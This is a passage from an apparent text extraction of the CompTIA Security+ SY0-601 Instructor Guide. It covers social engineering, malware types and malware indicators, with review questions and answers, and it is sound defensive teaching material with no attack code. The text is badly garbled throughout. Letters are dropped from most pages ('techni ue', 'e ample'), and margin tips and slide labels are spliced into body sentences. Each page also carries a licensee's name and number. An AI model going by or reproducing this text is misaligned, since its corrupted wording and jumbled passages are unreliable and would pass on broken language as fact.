employee's permission. or instance, an attacker might impersonate a member of the
cleaning crew and re uest that an employee hold the door open while they bring in a
cleaning cart or mop bucket. Alternatively, piggy backing may be a means of an insider
threat actor to allow access to someone without recording it in the building's entry log.
Another techni ue is to persuade someone to hold a door open, using an e cuse, such
as I've forgotten my badge key.

esson Identifying Social Engineering and alware | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 77

Identity Fraud and Invoice Scams Show Slide(s)

Identity fraud is a specific type of impersonation where the attacker uses specific Identity raud and
details of someone's identity. A typical consumer identity fraud is using someone else's Invoice cams
name and address to make a loan application or using stolen credit card details to start
a mobile phone contract. Invoice scams are another common type of identity fraud.
The fraudster will usually spoof the invoice details of a genuine supplier, but change
the bank account number. This might rely on the target not double checking the
account, or it might be combined with a social engineering contact call to convince the
target that the account change is genuine.

Sometimes the terms identity fraud and identity theft are used to distinguish between
making up an identity versus stealing someone else s identity.

In terms of attacks on corporate networks, identity fraud is likely to involve

compromising a computer account. arious social engineering techni ues can be used
to obtain account credentials without having to rely on malware, Apart from eliciting
credential information from a user directly, some of these techni ues include
• Credential databases account details from previous attacks are widely available
haveibeenpwned.com . An attacker can try to match a target in one of these
databases and hope that they have reused a password. The attacker could also
leverage third party sites for impersonation. or e ample, rather than using a work
account, they could gain control of a social media account.

• houlder surfin a threat actor can learn a password or IN or other secure

information by watching the user type it. Despite the name, the attacker may not
have to be in close pro imity to the target they could use high powered binoculars
or CCT to directly observe the target remotely.
Show Slide(s)
• Lunchtime attacks most authentication methods are dependent on the physical
security of the workstation. If a user leaves a workstation unattended while logged
on, an attacker can physically gain access to the system. This is often described as a hishing, haling, and
lunchtime attack. Most operating systems are set to activate a password protected ishing
screen saver after a defined period of no keyboard or mouse activity. sers should
Teaching
also be trained to lock or log o the workstation whenever they leave it unattended.
Tip
ome of this
Phishing, Whaling, and Vishing terminology is of
limited value, but
Phishing is a combination of social engineering and spoofing. It persuades or tricks students need to learn
it. The basic points
the target into interacting with a malicious resource disguised as a trusted one,
are that phishing
traditionally using email as the vector. A phishing message might try to convince the can use any type
user to perform some action, such as installing disguised malware or allowing a remote of communication
access connection by the attacker. ther types of phishing campaign use a spoof method to trick the
website set up to imitate a bank or e commerce site or some other web resource that target into interacting
should be trusted by the target. The attacker then emails users of the genuine website with a spoofed
resource, and can
informing them that their account must be updated or with some sort of hoa alert or
either be general
alarm, supplying a disguised link that actually leads to the spoofed site. hen the user in nature or highly
authenticates with the spoofed site, their logon credentials are captured. targeted.

esson Identifying Social Engineering and alware | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 78 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Example phishing email On the right, you can see the message in its true form as the mail client has
stripped out the formatting (shown on the left) designed to disguise the nature of the links.

There are several phishing variants to be aware of

• Spear phishing a phishing scam where the attacker has some information that
makes an individual target more likely to be fooled by the attack. ach phishing
message is tailored to address a specific target user. The attacker might know the
name of a document that the target is editing, for instance, and send a malicious
copy, or the phishing email might show that the attacker knows the recipient's full
name, ob title, telephone number, or other details that help convince the target
that the communication is genuine.

• Whaling a spear phishing attack directed specifically against upper levels of

management in the organi ation C s and other big fish . pper management
may also be more vulnerable to ordinary phishing attacks because of their
reluctance to learn basic security procedures.

• Vishing a phishing attack conducted through a voice channel telephone or

oI , for instance . or e ample, targets could be called by someone purporting
to represent their bank asking them to verify a recent credit card transaction and
re uesting their security details. It can be much more difficult for someone to refuse
a re uest made in a phone call compared to one made in an email.

apid improvements in deep fake technology (forbes.com sites essedamiani 01 0 0 a-

voice-deepfake-was-used-to-scam-a-ceo-out-of- 000) are likely to make phishing attempts
via voice and even video messaging more prevalent in the future.

• SMiShing this refers to using simple message service M te t communications

as the vector.

Show Slide(s) Spam, Hoaxes, and Prepending

pam, oa es, and
nsolicited email, or spam, is used as the vector for many attacks. Threat actors
repending harvest email addresses from marketing lists or databases of historic privacy breaches,
or might try to target every email address at a certain company. Mass mail attacks

esson Identifying Social Engineering and alware | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 79

could also be perpetrated over any type of instant messaging or Internet messaging
service SPIM .
Hoaxes, such as security alerts or chain emails, are another common social
engineering techni ue, often combined with phishing attacks. An email alert or web
pop up will claim to have identified some sort of security problem, such as virus
infection, and o er a tool to fi the problem. The tool of course will be some sort of
Tro an application. Malvertising e ploits the use of space on legitimate websites set
aside for advertising served from content delivery networks CDNs without much
oversight blog.talosintelligence.com malvertising deepdive.html . Criminals
will also use sophisticated phone call scams to try to trick users into revealing login
credentials or financial account details.
A phishing or hoa email can be made more convincing by prepending. In an o ensive
sense, prepending means adding te t that appears to have been generated by the mail
system. or e ample, an attacker may add to the sub ect line to make it appear
as though the message is a reply or may add something like MAIL A A D to
make it appear as though a message has been scanned and accepted by some security
software. Conversely, some mail systems may perform prepending legitimately,
such as tagging e ternal messages or messages with a warning if they have not been
definitively identified as spam but that do have suspicious elements.

Pharming and Credential Harvesting Show Slide(s)

Direct messages to a single contact have uite a high chance of failure. ther social harming and
engineering techni ues still use spoofed resources, such as fake sites and login pages, Credential arvesting
but rely on redirection or passive methods to entrap victims.
Teaching
Pharming Tip
Make sure students
Pharming is a passive means of redirecting users from a legitimate website to a can distinguish
malicious one. ather than using social engineering techni ues to trick the user, phishing and
pharming relies on corrupting the way the victim's computer performs Internet name pharming.
resolution, so that they are redirected from the genuine site to the malicious one. or
e ample, if mybank.foo should point to the I address . . . , a pharming attack would
corrupt the name resolution process to make it point to I address . . . .

Typosquatting
ather than redirection, a threat actor might use typosquatting. This means that
the threat actor registers a domain name that is very similar to a real one, such
as connptia.org, hoping that users will not notice the di erence. These are
also referred to as cousin, lookalike, or doppelganger domains. Typos uatting might
be used for pharming and phishing attacks. Another techni ue is to register a
hi acked subdomain using the primary domain of a trusted cloud provider, such as
onmicrosoft.com. If a phishing message appears to come from comptia.
onmicrosoft.com, many users will be inclined to trust it.
Watering Hole Attack
A watering hole attack is another passive techni ue where the threat actor does not
have to risk communicating directly with the target. It relies on the circumstance that a
group of targets may use an unsecure third party website. or e ample, sta running
an international e commerce site might use a local pi a delivery firm. If an attacker
can compromise the pi a delivery firm's website or deploy a type of malvertising,
they may be able infect the computers of the e commerce company's employees and
penetrate the e commerce company systems.

esson Identifying Social Engineering and alware | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 80 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
In uence Campaigns
Teaching
Tip
The Twitter hack
to persuade
people to buy fake
cryptocurrency via
in ected tweets from
high profile individuals
is one e ample of a
non political in uence
campaign, albeit
a short lived one
theverge.com
elon musk bill gates
twitter hack bitcoin
scam compromised .
esson Identifying Social Engineering and
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Credential Harvesting
ithin the general realm of phishing and pharming, credential harvesting is a
campaign specifically designed to steal account credentials. The attacker may have
more interest in selling the database of captured logins than trying to e ploit them
directly. uch attacks will use an alarming message such as our account is being used
to host child pornography or There is a problem with your account storage and a link
to a pharming site embroidered with the logos of a legitimate service provider, such as
oogle, Microsoft, acebook, or Twitter. Attacks using malvertising or scripts in ected
into shopping cart code are also popular csoonline.com article what is
magecart how this hacker group steals payment card data.html . Targeted credential
harvesting might be directed against a single company's password reset or account
management portal.
In uence Campai ns
An in uence campaign is a ma or program launched by an adversary with a high level
of capability, such as a nation state actor, terrorist group, or hacktivist group. The goal
of an in uence campaign is to shift public opinion on some topic. Most high profile
in uence campaigns that have been detected target election activity, but actors may
use such campaigns to pursue a number of goals. ith state actors, the concept of
soft power refers to using diplomatic and cultural assets to achieve an ob ective. hen
deployed along with espionage, disinformation fake news, and hacking, a hostile
campaign can be characteri ed as hybrid warfare assets.publishing.service.gov.uk
government uploads system uploads attachment data file MCDC
C Information note Conceptual oundations.pdf .
Diplomatic activity and election meddling by foreign security services has a very long
history and well established tactics. Modern campaigns can use social media to ensure
wide distribution of hoa es and invented stories. Actors can use AI assisted bots and
armies of people to open or hack accounts and repeat or reinforce messages that
support the campaign's aims.
Apart from destabili ing the host country generally, in uence campaigns might a ect
private companies because they become caught up within a fake story. It is important
for companies to closely monitor references to them on social media and take steps
to correct or remove false or misleading posts. hen an in uence campaign is
detected, companies operating in critical industries utilities, election management,
transportation should enter a heightened state of alert.
alware | Topic A
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 81

Review Activity:
Social Engineering Techniques
Answer the following uestions

1. The help desk takes a call and the caller states that she cannot connect to
the e-commerce website to check her order status. She would also like a
user name and password. The user gives a valid customer company name
but is not listed as a contact in the customer database. The user does not
know the correct company code or customer ID. Is this likely to be a social
engineering attempt, or is it a false alarm?

This is likely to be a social engineering attempt. The help desk should not give out any
information or add an account without confirming the caller's identity.

2. A purchasing manager is browsing a list of products on a vendor's website

when a window opens claiming that anti-malware software has detected
se eral thousand files on his computer that are in ected ith iruses
Instructions in the o cial loo in indo indicate the user should clic a
link to install software that will remove these infections. What type of social
engineering attempt is this, or is it a false alarm?

This is a social engineering attempt utili ing a watering hole attack and or malvertising.

3. Your CEO calls to request market research data immediately be forwarded

to her personal email address. You recognize her voice, but a proper request
orm has not een filled out and use o third part email is prohi ited
he states that normall she ould fill out the orm and should not e an
exception, but she urgently needs the data to prepare for a round table at
a conference she is attending. What type of social engineering techniques
could this use, or is it a false alarm?

If social engineering, this is spear phishing the attack uses specific detail over a voice
channel vishing . It is possible that it uses deep fake technology for voice mimicry.
The use of a sophisticated attack for a relatively low value data asset seems unlikely,
however. A fairly safe approach would be to contact the C back on a known
mobile number.

4. Your company manages marketing data and private information for many
hi h profile clients ou are hostin an open da or prospecti e emplo ees
With the possibility of social engineering attacks in mind, what precautions
should emplo ees ta e hen the uests are ein sho n around the o ce

mployees should specifically be wary of shoulder surfing attempts to observe

passwords and the like.

esson Identifying Social Engineering and alware | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 82 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Teaching
Tip
asic malware types
are covered in e ams
from IT up, but
ensure students can
distinguish all the
types listed here. Try
to focus on detection
of indicators.
ther parts of
ob ective . , such
as cryptographic,
password, and
physical attacks, are
covered elsewhere in
the course.
Show Slide(s)
Malware Classification
Teaching
Tip
Try to distinguish
methods that classify
malware by the
vector from those
that describe the
payload or goal of the
malware.
esson Identifying Social Engineering and
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Topic 4B
Analyze Indicators
of Malware-Based Attacks
EXAM OBJECTIVES COVERED
1. Given a scenario, analyze potential indicators to determine the type of attack
.1 Given a scenario, use the appropriate tool to assess organizational security
(Cuckoo only)
ne of the most prevalent threats to computers today is malicious code. As a security
professional, you will likely have e perience in dealing with unwanted software
infecting your systems. y classifying the various types of malware and identifying the
signs of infection, you will be better prepared remediate compromised systems or
prevent malware from e ecuting in the first place.
al are Classification
Many of the intrusion attempts perpetrated against computer networks depend
on the use of malicious software, or malware. alware is usually simply defined as
software that does something bad, from the perspective of the system owner. There
are many types of malware, but they are not classified in a rigorous way, so some
definitions overlap or are blurred. ome malware classifications, such as Tro an, virus,
and worm, focus on the vector used by the malware. The vector is the method by
which the malware e ecutes on a computer and potentially spreads to other network
hosts. Another complicating factor with malware classification is the degree to which
its installation is e pected or tolerated by the user. The following categories describe
some types of malware according to vector
• iruses and worms these represent some of the first types of malware and spread
without any authori ation from the user by being concealed within the e ecutable
code of another process.
• Trojan malware concealed within an installer package for software that appears
to be legitimate. This type of malware does not seek any type of consent for
installation and is actively designed to operate secretly.
• Potentially unwanted programs (PUPs) otentially unwanted applications
As software installed alongside a package selected by the user or perhaps
bundled with a new computer system. nlike a Tro an, the presence of a is
not automatically regarded as malicious. It may have been installed without active
consent or consent from a purposefully confusing license agreement. This type of
software is sometimes described as grayware rather than malware.
ther classifications are based on the payload delivered by the malware. The payload
is an action performed by the malware other than simply replicating or persisting on
a host. amples of payload classifications include spyware, rootkit, remote access
Tro an AT , and ransomware.
alware | Topic
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 83

alware classification by vector.

Computer iruses Show Slide(s)

A computer virus is a type of malware designed to replicate and spread from computer Computer iruses
to computer, usually by infecting e ecutable applications or program code. There are
several di erent types of viruses and they are generally classified by the di erent types
of file or media that they infect
• Non resident file infector the virus is contained within a host e ecutable file and
runs with the host process. The virus will try to infect other process images on
persistent storage and perform other payload actions. It then passes control back to
the host program.

• Memory resident when the host file is e ecuted, the virus creates a new process
for itself in memory. The malicious process remains in memory, even if the host
process is terminated.

• oot the virus code is written to the disk boot sector or the partition table of a
fi ed disk or media, and e ecutes as a memory resident process when the
starts or the media is attached to the computer.

• cript and macro viruses the malware uses the programming features available
in local scripting engines for the and or browser, such as ower hell, indows
Management Instrumentation MI , Java cript, Microsoft ffice documents with
isual asic for Applications A code enabled, or D documents with Java cript
enabled.

In addition, the term multipartite is used for viruses that use multiple vectors and
polymorphic for viruses that can dynamically change or obfuscate their code to evade
detection.
hat these types of viruses have in common is that they must infect a host file or
media. An infected file can be distributed through any normal means on a disk, on
a network, as an attachment to an email or social media post, or as a download from
a website.

esson Identifying Social Engineering and alware | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 84 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
Computer orms and
ileless Malware
Teaching
Tip
here virus re uires
a file or media to
replicate, worms and
fileless can replicate
between processes in
memory on the local
host and over network
shares.
ileless is tricky to
define e actly, but it
illustrates the wide
range of vectors that
threat actors can
e ploit.
esson Identifying Social Engineering and
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Unsafe attachment detected by Outlook s mail filter The double file extension is an unsophisticated
attempt to fool any user not already alerted by the use of both English and German in the message
text. (Screenshot used with permission from icrosoft.)
Computer Worms and Fileless Malware
A computer worm is memory resident malware that can run without user intervention
and replicate over network resources. A virus is e ecuted only when the user performs
an action such as downloading and running an infected e ecutable process, attaching
an infected stick, or opening an infected ord document with macros enabled. y
contrast, a worm can e ecute by e ploiting a vulnerability in a process when the user
browses a website, runs a vulnerable server application, or is connected to an infected
file share. or e ample, the Code ed worm was able to infect early versions of
Microsoft's II web server software via a bu er over ow vulnerability. It then scanned
randomly generated I ranges to try to infect other vulnerable II servers caida.org
research security code red .
The primary e ect of the first types of computer worm is to rapidly consume network
bandwidth as the worm replicates. A worm may also be able to crash an operating
system or server application performing a Denial of ervice attack . Also, like viruses,
worms can carry a payload that may perform some other malicious action.
The Conficker worm illustrated the potential for remote code e ecution and memory
resident malware to e ect highly potent attacks secureworks.com research
downadup removal . As malware has continued to be developed for criminal intent
and security software became better able to detect and block static threats, malware
code and techni ues have become more sophisticated. The term fileless has gained
prominence to refer to these modern types of malware. ileless is not a definitive
classification, but it describes a collection of common behaviors and techni ues
• ileless malware does not write its code to disk. The malware uses memory resident
techni ues to run in its own process, within a host process or dynamic link library
DLL , or within a scripting host. This does not mean that there is no disk activity
alware | Topic
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 85

at all, however. The malware may change registry values to achieve persistence
e ecuting if the host computer is restarted . The initial e ecution of the malware
may also depend on the user running a downloaded script, file attachment, or
Tro an software package.

• ileless malware uses lightweight shellcode to achieve a backdoor mechanism

on the host. The shellcode is easy to recompile in an obfuscated form to evade
detection by scanners. It is then able to download additional packages or payloads
to achieve the actor's actions on ob ectives. These packages can also be obfuscated,
streamed, and compiled on the y to evade automated detection.

• ileless malware may use live o the land techni ues rather than compiled
e ecutables to evade detection. This means that the malware code uses
legitimate system scripting tools, notably ower hell and indows Management
Instrumentation MI , to e ecute payload actions. If they can be e ecuted with
sufficient permissions, these environments provide all the tools the attacker needs
to perform scanning, reconfigure settings, and e filtrate data.

The terms advanced persistent threat (APT) and advanced volatile threat (A T) can be
used to describe this general class of modern fileless live o the land malware.
Another useful classification is low observable characteristics L C attack mcafee.
com enterprise en us security awareness ransomware what is fileless malware.html .
The e act classification is less important than the reali ation that adversaries can use
any variety of coding tricks to e ect intrusions and that their tactics, techni ues, and
procedures to evade detection are continually evolving.

Spyware and Keyloggers Show Slide(s)

The first viruses and worms focused on the destructive potential of being able to pyware and
replicate. As the profitable uses this software became apparent, however, they started eyloggers
to be coded with payloads designed to facilitate intrusion, fraud, and data theft.
arious types of unwanted code and malware perform some level of monitoring Teaching
Tip
• Tracking cookies cookies are plain te t files, not malware, but if browser settings
allow third party cookies, they can be used to record pages visited, search ueries, pyware keylogger is
a means of classifying
browser metadata, and I address. Tracking cookies are created by adverts and
malware by its
analytics widgets embedded into many websites. purpose, rather than
vector.
• Adware this is a class of grayware that performs browser reconfigurations,
such as allowing tracking cookies, changing default search providers, opening
sponsor's pages at startup, adding bookmarks, and so on. Adware may be installed
as a program or as a browser e tension plug in.

• Spyware this is malware that can perform adware like tracking, but also monitor
local application activity, take screenshots, and activate recording devices, such as a
microphone or webcam. Another spyware techni ue is perform DN redirection to
pharming sites.

• A keylogger is spyware that actively attempts to steal confidential information by

recording keystrokes. The attacker will usually hope to discover passwords or credit
card data.

esson Identifying Social Engineering and alware | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 86 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Actual eylogger is indows software that can run in the background to monitor different kinds of
computer activity (opening and closing programs, browsing websites, recording keystrokes, and
capturing screenshots). (Screenshot used with permission from Actual eylogger.com.)

eyloggers are not only implemented as software. A malicious script can transmit key
presses to a third-party website. There are also hardware devices to capture key presses to
a modified US adapter inserted between the keyboard and the port. Such devices can store
data locally or come with i- i connectivity to send data to a covert access point. Other
attacks include wireless sniffers to record key press data, overlay AT pin pads, and so on.

Show Slide(s) Backdoors and Remote Access Trojans

ackdoors and
Any type of access method to a host that circumvents the usual authentication method
emote Access and gives the remote user administrative control can be referred to as a backdoor.
Tro ans A remote access trojan (RAT) is backdoor malware that mimics the functionality of
legitimate remote control programs, but is designed specifically to operate covertly.
nce the AT is installed, it allows the threat actor to access the host, upload files, and
install software or use live o the land techni ues to e ect further compromises.

In this context, AT can also stand for emote Administration Tool. A host that is under
malicious control is sometimes described as a zombie.

A compromised host can be installed with one or more bots. A bot is an automated
script or tool that performs some malicious activity. A group of bots that are all under
the control of the same malware instance can be manipulated as a botnet by the
herder program. A botnet can be used for many types of malicious purpose, including
triggering distributed denial of service DDo attacks, launching spam campaigns, or
performing cryptomining.

esson Identifying Social Engineering and alware | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 87

SubSeven AT. (Screenshot used with permission from ikimedia Commons by CCAS .0 International.)

hether a backdoor is used as a standalone intrusion mechanism or to manage

bots, the threat actor must establish a connection from the compromised host to a
command and control (C2 or C&C) host or network. This network connection is usually
the best way to identify the presence of a AT, backdoor, or bot. There are many means
of implementing a C C network as a covert channel to evade detection and filtering.
istorically, the Internet relay chat (IRC) protocol was popular. Modern methods are
more likely to use command se uences embedded in TT or DN traffic.

ackdoors can be created in other ways than infection by malware. Programmers

may create backdoors in software applications for testing and development that are
subse uently not removed when the application is deployed. ackdoors are also created
by misconfiguration of software or hardware that allows access to unauthorized users.
Examples include leaving a router configured with the default administrative password,
having a emote esktop connection configured with an unsecure password, or leaving a
modem open to receive dial-up connections.

Rootkits Show Slide(s)

In indows, malware can only be manually installed with local administrator privileges. ootkits
This means the user must be confident enough in the installer package to enter the
credentials or accept the ser Account Control AC prompt. indows tries to protect
the system from abuse of administrator privileges. Critical processes run with a higher
level of privilege T M . Conse uently, Tro ans installed in the same way as regular

esson Identifying Social Engineering and alware | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 88 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

software cannot conceal their presence entirely and will show up as a running process
or service. ften the process image name is configured to be similar to a genuine
e ecutable or library to avoid detection. or e ample, a Tro an may use the filename
run d to mas uerade as run dll . To ensure persistence running when the
computer is restarted , the Tro an may have to use a registry entry or create itself as a
service, which can usually be detected fairly easily.
If the malware can be delivered as the payload for an e ploit of a severe vulnerability,
it may be able to e ecute without re uiring any authori ation using T M privileges.
Alternatively, the malware may be able to use an e ploit to escalate privileges after
installation. Malware running with this level of privilege is referred to as a rootkit. The
term derives from NI Linu where any process running as root has unrestricted
access to everything from the root of the file system down.
In theory, there is nothing about the system that a rootkit could not change. In practice,
indows uses other mechanisms to prevent misuse of kernel processes, such as
code signing microsoft.com security blog hardening the system and
maintaining integrity with windows defender system guard . Conse uently, what
a rootkit can do depends largely on adversary capability and level of e ort. hen
dealing with a rootkit, you should be aware that there is the possibility that it can
compromise system files and programming interfaces, so that local shell processes,
such as plorer, taskmgr, or tasklist on indows or ps or top on Linu , plus port
scanning tools, such as netstat, no longer reveals its presence at least, if run from the
infected machine . A rootkit may also contain tools for cleaning system logs, further
concealing its presence microsoft.com en us wdsi threats malware encyclopedia
description Name in fCutwail .

Software processes can run in one of several rings. ing 0 is the most privileged (it
provides direct access to hardware) and so should be reserved for kernel processes only.
ing is where user-mode processes run drivers and I O processes may run in ing 1 or
ing . This architecture can also be complicated by the use of virtualization.

There are also e amples of rootkits that can reside in firmware either the computer
firmware or the firmware of any sort of adapter card, hard drive, removable drive, or
peripheral device . These can survive any attempt to remove the rootkit by formatting
the drive and reinstalling the . or e ample, the intelligence agencies have
developed DarkMatter and uarkMatter I rootkits targeting the firmware on Apple
Macbook laptops pcworld.com article after cia leak intel security releases
detection tool for efi rootkits.html .

Show Slide(s) Ransomware, Crypto-Malware, and Logic Bombs

ansomware, Crypto
Ransomware is a type of malware that tries to e tort money from the victim. ne class
Malware, and Logic of ransomware will display threatening messages, such as re uiring indows to be
ombs reactivated or suggesting that the computer has been locked by the police because it
was used to view child pornography or for terrorism. This may apparently block access
to the file system by installing a di erent shell program, but this sort of attack is usually
relatively simple to fi .

esson Identifying Social Engineering and alware | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 89

annaCry ransomware. (Image by ikimedia Commons.)

The crypto malware class of ransomware attempts to encrypt data files on any fi ed,
removable, and network drives. If the attack is successful, the user will be unable to
access the files without obtaining the private encryption key, which is held by the
attacker. If successful, this sort of attack is e tremely difficult to mitigate, unless the
user has up to date backups of the encrypted files. ne e ample of this is Cryptolocker,
a Tro an that searches for files to encrypt and then prompts the victim to pay a sum of
money before a certain countdown time, after which the malware destroys the key that
allows the decryption.
ansomware uses payment methods, such as wire transfer, cryptocurrency, or
premium rate phone lines, to allow the attacker to e tort money without revealing his
or her identity or being traced by local law enforcement.
Another type of crypto malware hi acks the resources of the host to perform
cryptocurrency mining. This is referred to as crypto-mining or crypto acking. The total
number of coins within a cryptocurrency is limited by the difficulty of performing the
calculations necessary to mint a new digital coin. Conse uently, new coins can be very
valuable, but it takes enormous computing resources to discover them. Crypto acking
is often performed across botnets.
ome types of malware do not trigger automatically. aving infected a system, they
wait for a pre configured time or date time bomb or a system or user event logic
bomb . Logic bombs also need not be malware code. A typical e ample is a disgruntled
system administrator who leaves a scripted trap that runs in the event his or her
account is deleted or disabled. Anti virus software is unlikely to detect this kind of
malicious script or program. This type of trap is also referred to as a mine.

esson Identifying Social Engineering and alware | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 90 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Show Slide(s)
Malware Indicators
Teaching
Tip
Make sure students
know which tools
to use to collect
indicators of malware
presence and type.
Show Slide(s)
rocess Analysis
esson Identifying Social Engineering and
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
Malware Indicators
iven the range of malware types, there are many potential indicators. ome types
of malware display obvious changes, such as ad usting browser settings or displaying
ransom notices. If malware is designed to operate covertly, indicators can re uire
detailed analysis of process, file system, and network behavior.
Anti irus otifications
Most hosts should be running some type of anti-virus (A-V) software. hile the
A moniker remains popular, these suites are better conceived of as endpoint
protection platforms (EPPs) or ne t gen A . These detect malware by signature
regardless of type, though detection rates can vary uite widely from product to
product. Many suites also integrate with user and entity behavior analytics (UEBA)
and use AI backed analysis to detect threat actor behavior that has bypassed malware
signature matching.
Sandbox Execution
If it is not detected by endpoint protection, you may want to analy e the suspect code
in a sandbo ed environment. A sandbox is a system configured to be completely
isolated from its host so that the malware cannot break out. The sandbo will be
designed to record file system and registry changes plus network activity. Cuckoo
is packaged software that aims to provide a turnkey sandbo solution
cuckoosandbo .org .
Resource Consumption
Abnormal resource consumption can be detected using a performance monitor, Task
Manager, or the top Linu utility. Indicators such as e cessive and continuous C
usage, memory leaks, disk read write activity, and disk space usage can be signs of
malware, but can also be caused by many other performance and system stability
issues. Also, it is only really poorly written malware or malware that performs intensive
operations botnet DDo , crypto acking, and cryptoransomware, for instance that
displays this behavior. esource consumption could be a reason to investigate a
system rather than definitive proof of infection.
File System
hile fileless malware is certainly prevalent, file system change or anomaly analysis
is still necessary. ven if the malware code is not saved to disk, the malware is still
likely to interact with the file system and registry, revealing its presence by behavior.
A computer's file system stores a great deal of useful metadata about when files were
created, accessed, or modified. Analy ing these metadata and checking for suspicious
temporary files can help you establish your timeline of events for an incident that has
left traces on a host and its files.
Process Analysis
ecause shellcode is easy to obfuscate, it can often evade signature based A
products. Threat hunting and security monitoring must use behavioral based
techni ues to identify infections. This means close analysis of the processes running
in system memory on a host. To perform abnormal process behavior analysis
e ectively, you should build up a sense of what is normal in a system and spot
deviations in a potentially infected system. ou also need to use appropriate analysis
tools. Sysinternals docs.microsoft.com en us sysinternals is a suite of tools designed
to assist with troubleshooting issues with indows, and many of the tools are suited
to investigating security issues. The ysinternals tool rocess plorer is an enhanced
alware | Topic
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 91

version of Task Manager. ou can view e tra information about each process and
better understand how processes are created in parent child relationships.
In this e ample, the Metasploit ramework is being used to obtain access via a
remotely e ecuted ower hell prompt, with privileges obtained by passing a captured
hash. This attack leverages the ysinternals s ec utility to drop a service e ecutable
into the Admin share on the remote machine. In this variant of the attack, the service
starts ower hell. ointing to the powershell.e e image in rocess plorer shows the
parameters that the process launched with. In this case, the command used to start
this is not typical of ower hell usage. There is a long string of characters, which is
binary code represented in ase . The script is in ecting this into a new DLL, stored in
memory only.

Observing use of PsExec to invoke a PowerShell script that creates memory-resident shellcode.
(Screenshot Process Explorer docs.microsoft.com en-us sysinternals.)

This sort of behavior can only be observed in real time when the malware is e ecuted
in a sandbo . Threat hunting and automated detection tools can use detailed logging,
such as that provided by ystem Monitor github.com wift n ecurity sysmon config ,
to record and identify malicious process behavior.
Along with observing how a process interacts with the file system, network activity is
one of the most reliable ways to identify malware. Threat data can be used to correlate
connections to known bad I addresses and domains, but malware may try to connect
to continually shifting endpoints, utili ing techni ues such as fast u and domain
generation algorithms D A . It may try to use social media and cloud services to blend
in with legitimate traffic.

esson Identifying Social Engineering and alware | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 92 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Indicators of Malware-Based Attacks
Answer the following uestions

1. You are troubleshooting a user's workstation. At the computer, an app

indo displa s on the screen claimin that all o our files are encr pted
The app window demands that you make an anonymous payment if you ever
ant to reco er our data hat t pe o mal are has in ected the computer
This is some type of ransomware, but it will take more investigation whether it is
actually crypto malware or not.
2. ou are recommendin di erent anti irus products to the C o small
tra el ser ices firm The C is con used ecause the had heard that
Trojans represent the biggest threat to computer security these days. What
explanation can you give?
hile anti virus A remains a popular marketing description, all current security
products worthy of consideration will try to provide protection against a full range of
malware and potentially unwanted program threats.
3. You are writing a security awareness blog for company CEOs subscribed
to our threat plat orm h are ac doors and Tro ans di erent a s o
classifying and identifying malware risks?
A Tro an means a malicious program mas uerading as something else a backdoor is
a covert means of accessing a host or network. A Tro an need not necessarily operate
a backdoor and a backdoor can be established by e ploits other than using Tro ans.
The term remote access tro an ( AT) is used for the specific combination of Tro an
and backdoor.
4. You are investigating a business email compromise (BEC) incident. The
email account of a developer has been accessed remotely over webmail.
In esti atin the de eloper s or station finds no indication o a malicious
process, but you do locate an unknown USB extension device attached to
one of the rear ports. Is this the most likely attack vector, and what type of
malware would it implement?
It is likely that the device implements a hardware based keylogger. This would not
necessarily re uire any malware to be installed or leave any trace in the file system.
5. A user s computer is per ormin e tremel slo l pon in esti atin ou find
that a process named n0tepad.exe is utilizing the CPU at rates of 80-90%. This
is accompanied by continual small disk reads and writes to a temporary folder.
Should you suspect malware infection and is any particular class of indicated?
es, this is malware as the process name is trying to mas uerade as a legitimate
process. It is not possible to conclusively determine the type without more
investigation, but you might initially suspect a crypto miner crypto acker.

6. Is Cuckoo a type of malware or a security product?

Cuckoo is a security product designed to analy e malware as it runs in an isolated

sandbo environment.

esson Identifying Social Engineering and alware | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 93

Lesson 4
Summary
ou should be able to identify the social engineering and malware based methods that Teaching
threat actors use to e ect intrusions. Tip
Check that students
Guidelines for Identifying Social Engineering and Malware are confident about
the content that has
been covered. If there
